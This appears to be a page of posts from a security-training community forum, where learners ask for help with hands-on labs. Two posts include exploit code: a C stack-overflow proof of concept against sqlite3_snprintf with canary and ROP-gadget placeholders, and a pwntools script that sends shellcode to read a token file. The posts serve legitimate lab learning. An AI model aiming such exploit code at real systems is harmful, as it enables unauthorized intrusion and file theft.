Foundational Static Analysis: API Analysis
Hi all, I'm stuck in this part, where using Ghidra, I have to find where the Windows API GetModuleHandleA is used, in the binary called exercise_two.exe, and once located, find the parameter of this function. Taking a look about GetModuleHandleA, there's no references or calls to API in any part of the code. Also tried to look for references to GetProcAddress or LoadLibrary and nothing. Am doing something wrong? Any idea to find the "parameter" of the function that calls to the API?. Is the only question from this part remaining... Thanks and regards.14Views1like0CommentsLinux Stack Overflow Ep.6
I am having trouble figuring how this lab. I got the other questions, but can't get the token. This is the code I am running, but it just causing a segmentation fault. #include <assert.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <sqlite3.h> #define RETADDR_OFFSET 0 #define CANARY_OFFSET 0x40 #define BUF_OFFSET 0x88 #define CANARY 0xbaadd00dbaadd00dull #define ROPGADGET 0xdeadbeefdeadbeefull #define NGADGETS 1 struct payload { uint8_t padding1[BUF_OFFSET-CANARY_OFFSET]; uint64_t canary; uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8]; uint64_t ropchain[NGADGETS]; }__attribute__((packed, aligned(1))); int main(int argc, char *argv[]) { char dst[256]; struct payload p; memset(p.padding1, 'a', sizeof(p.padding1)); p.canary = CANARY; memset(p.padding2, 'b', sizeof(p.padding2)); p.ropchain[0] = ROPGADGET; size_t target_n = 0x80000000; assert(sizeof(p) + 3 <= target_n); size_t n = target_n - sizeof(p) - 3; size_t target_i = 0x100000000 + (sizeof(p) / 2); char *src = calloc(1, target_i); if (!src) { printf("bad allocation\n"); return -1; } size_t cur = 0; memcpy(src, &p, sizeof(p)); cur += sizeof(p); memset(src+cur, '\'', n/2); cur += n/2; assert(cur < 0x7ffffffeul); memset(src+cur, 'c', 0x7ffffffeul-cur); cur += 0x7ffffffeul-cur; src[cur] = '\xc0'; cur++; memset(src+cur, '\x80', target_i - cur); cur = target_i; src[cur-1] = '\0'; sqlite3_snprintf((int) 256, dst, "'%!q'", src); free(src); return 0; }27Views1like1CommentNeed Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immersivelabs/comments/1ap3tub/pwntools_ep_6_demonstrate_your_skills/) but it is still not working. Could you please help me with this if possible shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) is what I tried from pwn import * import struct # Start the challenge binary p = process("/opt/demonstrate-challenge") # Use the correct path # === Part 1: Solve Arithmetic Challenge === p.recvuntil(b"What is the sum of ") numbers = p.recvline().decode().strip().split(" and ") num1 = int(numbers[0]) num2 = int(numbers[1].split("?")[0]) print(f"[+] Solving: {num1} + {num2} = {num1 + num2}") p.sendline(str(num1 + num2)) # === Part 2: Solve Packing Challenge === p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n") values = p.recvline().decode().strip().split(" and ") val1 = int(values[0]) val2 =int(values[1]) print(f"[+] Packing values: {val1} and {val2}") payload = struct.pack("<II", val1, val2) p.send(payload) # === Part 3: Leak Address of parsing_check() === elf = ELF("/opt/demonstrate-challenge") # Load the ELF binary parsing_check_addr = elf.symbols['parsing_check'] # Get function address print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}") p.sendline(str(parsing_check_addr)) # === Part 4: Send Shellcode to Read /home/token-user/token.txt === file_path = '/home/token-user/token.txt' shellcode = shellcraft.cat2(file_path, 1, 40) # Pwntools shellcode shellcode += shellcraft.ret() # Ensure proper return assembled_shellcode = asm(shellcode) p.send(assembled_shellcode) # === Get Flag Output === response = p.recvall() print(response)84Views1like10CommentsHistoric Steganography Lab
I've been stuck on question 6 in the Stenography lab within the Historic Encryption upskill series. I'm not sure if I'm missing something within the command line or if the password/passphrase for the file is wrong. The password/passphrase is supposed to be "carnivale" Here are some screenshots to help zero in where I'm at. Thanks all!Solved41Views2likes2CommentsHelp again Linux CLI: Ep.16 – Combining Commands
I feel like I'm banging my head against the wall with the last 2 questions of this lab. I've been stuck on question 5 for the grep command. Any hints of what am I doing wrong? missing? And then the last question to run sleep. Huh? Is there a command to combine with the sleep 600? Any help would be appreciated. So I can finally do the last lab for Linux. =)Solved46Views1like2CommentsNeed Help - Java: Insecure Temporary Files
This exercise appears to be fairly simple at first glance, however I am unable to meet the criteria for my code to be accepted. When I click on "Test My Code", it says "Working" but not "Secure". The Deployment Log says, "VERIFY: Testing application functionality... VERIFY: PASS: Healthcheck page retrieved successfully VERIFY: PASS: Login page retrieved successfully VERIFY: PASS: Logged in with valid credentials VERIFY: PASS: User data loaded VERIFY: Tests complete. Application is WORKING Ideally, either the Application Log or the Deployment Log should provide some clue of the error or the task that is not completed. I have used the recommended method to create a Temporary File and delete it in a finally block after use. I can provide my code changes here, if needed.Solved27Views0likes2CommentsWeb Log Analysis: Ep.5 – Searching Web Server Logs using Linux CLI
Looking for some tips to help me get past step 1 (!) of this lab. I have tried to cs into Log-Files/ but nothing is returned, and the same for a cat command. I don't have experience with Linux but want to attempt this lab - maybe even some lab recommendations on how to get to a sufficient level with Linux would help? Thanks!!111Views1like7CommentsNeed help: Endace: Ep.3 – Elastic Integration Scenario
I stumbled upon this lab after my holidays and I was able to solve all questions except: So far I was able to follow the path from the first user, over to the second user and the service installement, priv. escalation, base64 decodings, pwd changes on domain controllers, etc. Problem 1: I can't find any named pipe for Q15. Not in the Elastic (and I'm checking there all datasources) nor in the wireshark dump/endance gui. Problem 2: But when I download files via "Extract File" in the Send Option I don't get any files (even when I take the whole timeline (~1h). I can download the logs and see some stuff in there but not one single file will help me to answer the Q16. So, does anyone has an idea where to look at? (or is the lab development not yet finished?) -stevenSolved61Views0likes4CommentsHelp with "Log Analysis: Web Log Analysis"
Hello, in lab "Log Analysis: Web Log Analysis", I got stuck at the question "How many errors were logged in total?" First, it is not clear if it is referring to the access.log's or the error.log's. Yet, I counted all lines in the access.log's where the status code is not 200 and the answer is wrong. I counted all "error" in the error.log's, yet incorrect. What am I doing wrong here?Solved80Views0likes10Comments